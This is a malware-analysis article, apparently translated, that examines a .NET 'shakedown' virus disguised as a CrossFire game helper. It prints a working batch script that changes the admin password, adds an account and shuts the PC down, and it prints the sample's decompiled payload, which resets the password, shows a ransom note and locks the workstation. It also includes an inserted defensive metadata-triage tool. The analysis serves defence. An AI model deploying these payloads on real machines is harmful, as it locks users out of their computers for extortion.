Virus and Trojan Hunting: Research on a .NET-based "shakedown" virus
I. Preface. Since malicious programs first appeared, their functions have evolved from simple destruction to privacy spying and information theft, and on to the currently very popular "shakedown" virus, which is used for extortion. With the times, virus writers increasingly want to use their technology to make ill-gotten money, and are becoming more and more profit-driven. This series of articles follows that development: having moved from viruses to Trojans, it now turns to the extortion virus.
II. What is the "shakedown" virus? In fact the "shakedown" (敲竹杠) virus is very simple. It tampers with the login password of our computer, and the virus author leaves his personal contact information so that the affected user will contact him and pay to recover. Such programs spread under highly attractive names such as "Free Q coins"; once the user clicks to run one, the system login password is tampered with. Ordinary users are often powerless in this situation, and since the amount of "ransom" demanded is generally not large, quite a few people pay to buy the password. Because writing this virus does not require a high level of technical skill, that too contributes to its prevalence. Here is an example of the simplest shakedown code; it is a batch (.bat) file:
@echo off
net user "Jiang Jun" wojiushimima
net user "add a password to QQ123456789" wojiushimima /add
shutdown.exe -s -t 10
The above code is briefly described here. The second line changes the password of the account named "Jiang Jun" to "wojiushimima" (pinyin for "I am the password"). Note: on my system, "Jiang Jun" is the Administrator account. In most cases the default administrator account is named "Administrator"; we also urge you not to use "Administrator" as the administrator account name, so that it is not exploited by malicious programs. The third line creates an account named "add a password to QQ123456789" whose password is also "wojiushimima". The fourth line shuts the computer down after 10 seconds. Running the above code:
Figure 1: running the "shakedown" virus
After the program has run for 10 seconds, the computer automatically shuts down and restarts, as shown in Figure 2:
Figure 2
It can be seen that there are now two accounts: the original account, whose password has been changed, and another account whose name is the virus author's contact information. We do not know the password of this account. At this point, to be able to use the computer normally again, an ordinary user can only contact the virus author to buy the password.
III. What is .NET
Since this article is about a .NET-based "shakedown" virus, it is necessary to briefly discuss what .NET is.
Actually, .NET is a platform designed by Microsoft to be independent of the operating system. It can be regarded as a virtual machine: whatever operating system the machine runs, as long as the .NET Framework is installed, .NET executable programs can run on it and enjoy the services .NET provides. That is the user's point of view; from the perspective of Windows, .NET is a series of DLL files running at the Ring 3 layer.
This may still sound abstract; interested readers can consult the relevant books for further study. I personally think we need not care too much about the definition. As a virus analyst, it is more important to master the reverse analysis method for the .NET platform.
.NET has one notable feature: whether a program is written in C#, C++ or VB, it is eventually compiled into the .NET intermediate language, IL. Static analysis of a .NET program uses a decompiler to turn the program's instruction bytes back into IL instructions or a high-level language, and the analyst reads the decompiled code to understand the program's flow and functions. Because an executable under .NET stores its metadata and IL code together, the statically decompiled code is highly readable and almost equivalent to the source code.
IV. Virus analysis
This virus sample is named mongocf.exe. From the name one can see that it is related to the game CrossFire (穿越火线): it is disguised as a game helper program but is actually a "shakedown" virus. What is special about it is that it is built on the .NET Framework, a novelty that instantly makes it look different. How do I know it uses the .NET Framework? That is the credit of PEiD:
Figure 3
Next we load the virus sample into Reflector. Because the code Reflector produces reads like source code, it is easy to find the core of the malicious program:
Figure 4
The complete code for this function is as follows:
private void timereffectick(object sender, EventArgs e)
{
    this.j++;
    if (this.j <= 3)
    {
        this.label4.Text = "scanning CF network vulnerabilities\x00b7\x00b7\x00b7";
        this.progressBar1.Value = this.j;
    }
    else if ((this.j <= 5) && (this.j > 3))
    {
        this.label4.Text = "monitoring CF module SX action\x00b7\x00b7";
        this.progressBar1.Value = this.j;
    }
    else if ((this.j < 10) && (this.j > 5))
    {
        this.label4.Text = "avoiding SX, loading auxiliary module\x00b7\x00b7\x00b7";
        this.progressBar1.Value = this.j;
    }
    else if (this.j == 10)
    {
        this.label4.Text = "module loaded successfully\x00b7\x00b7\x00b7";
        this.progressBar1.Value = this.j;
        // The actual payload: reset the current user's password, show the ransom note,
        // add a second account carrying the author's contact, then lock the workstation.
        ResetUserPassword(Environment.UserName, "razggcd");
        MessageBox.Show("The anti-cheat alliance reminds you: building a fair competition platform for healthy green gaming! For your computer's security, please top up QQ 1460459195 with 30QB and add it as a friend to ask for the password! Thank you for your cooperation!",
            "Message", MessageBoxButtons.OK, MessageBoxIcon.Asterisk);
        CreateNTUser("add Q1460459195", "razggcd", "");
        LockWorkStation();
    }
}
Obviously, the program uses an increasing counter to display different texts, creating the illusion that the game helper has taken effect and is running as advertised. When the counter reaches 10, the last branch executes: ResetUserPassword changes the user's password to "razggcd", and then a message is displayed asking the user to contact the virus author for the password, which is the "shakedown" itself. Next, a user named "add Q1460459195" is created with the password "razggcd". Finally, LockWorkStation locks the workstation. The whole process matches the batch version discussed earlier: although the virus has changed its external form, its internal mechanism is unchanged.
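The point made in section III (a .NET executable carries metadata and IL together) is what lets Reflector expose this method so quickly. As an added example that is not from the original article, the following C# program uses the in-box System.Reflection.Metadata API (.NET 6 or later assumed) to read the same information directly from a sample's metadata, without loading or executing it: every method, every native import (P/Invoke), and every string literal. The file name `sample.exe` and the class name `DotNetTriage` are placeholders chosen here.

```csharp
// Added example, not the article's code: static triage of a .NET sample.
// PEReader only parses the file; no code from the sample is loaded or run.
using System;
using System.IO;
using System.Reflection;
using System.Reflection.Metadata;
using System.Reflection.Metadata.Ecma335;
using System.Reflection.PortableExecutable;

static class DotNetTriage
{
    static void Main(string[] args)
    {
        string path = args.Length > 0 ? args[0] : "sample.exe"; // placeholder path
        using var pe = new PEReader(File.OpenRead(path));
        if (!pe.HasMetadata) { Console.WriteLine("not a .NET assembly"); return; }
        MetadataReader md = pe.GetMetadataReader();

        // 1. Methods per type. Managed names (ResetUserPassword, CreateNTUser) and
        //    native imports (e.g. user32!LockWorkStation) point at the payload.
        foreach (var th in md.TypeDefinitions)
        {
            var type = md.GetTypeDefinition(th);
            foreach (var mh in type.GetMethods())
            {
                var m = md.GetMethodDefinition(mh);
                string name = md.GetString(m.Name);
                if ((m.Attributes & MethodAttributes.PinvokeImpl) != 0)
                {
                    var imp = m.GetImport();
                    string dll = md.GetString(md.GetModuleReference(imp.Module).Name);
                    Console.WriteLine($"P/Invoke {dll}!{md.GetString(imp.Name)} as {name}");
                }
                else
                    Console.WriteLine($"method {md.GetString(type.Name)}.{name}");
            }
        }

        // 2. String literals: every ldstr operand lives in the #US heap, so the
        //    ransom message and the hard-coded password are readable as-is.
        if (md.GetHeapSize(HeapIndex.UserString) <= 1) return; // heap holds only the empty string
        var sh = MetadataTokens.UserStringHandle(1);            // offset 0 is the empty string
        while (!sh.IsNil)
        {
            string s = md.GetUserString(sh);
            if (s.Length > 3) Console.WriteLine($"string \"{s}\"");
            sh = md.GetNextHandle(sh);
        }
    }
}
```

Obfuscated samples often encrypt their literals, in which case the #US heap shows only the decryption routine's inputs and the method list is what remains useful.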
Through the above analysis we have obtained the password, and that is all there is to it.
V. Summary
Compared with the viruses and Trojans analyzed previously, analyzing a "shakedown" virus is actually very simple. In particular, a program based on .NET decompiles to something equivalent to its source, which is much easier to understand than assembly code. As "shakedown" viruses are now mainstream, I will choose some representative ones for research in the future. We hope everyone's awareness of defense will improve, so that the writers of these programs have nowhere to hide.